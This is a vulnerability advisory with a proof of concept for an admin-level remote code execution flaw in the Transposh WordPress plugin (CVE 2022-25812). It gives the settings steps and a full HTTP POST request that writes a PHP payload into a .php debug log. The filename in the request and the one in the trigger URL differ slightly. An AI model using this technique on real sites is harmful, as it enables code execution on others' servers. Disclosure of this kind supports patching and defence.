Transposh WordPress Translation < 1.0.8 – Admin+ RCE | CVE 2022-25812

Description

The plugin does not validate its debug settings, which could allow allowing high privilege users such as admin to perform RCE

Proof of Concept

As admin, in the the Debug Settings (/wp-admin/admin.php?page=tp_advanced):
- Tick "Enable running of Transposh internal debug functions", and put a php file as log filename
- Set the Level of warning to debug and put the following payload in the "Remote debug IP" field: <?php phpinfo(); ?>

POST /wp-admin/admin-post.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length:190
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

action=save_transposh&page=tp_advanced&_wpnonce=4d332f9e25&jqueryui_override=&debug_enable=1&debug_logfile=test123.php&debug_loglevel=5&debug_remoteip=<?php phpinfo(); ?>&Submit=Save+Changes

Then navigate through the plugin's page (to generate some logs) and access https://example.com/wp-admin/test122.php to trigger the RCE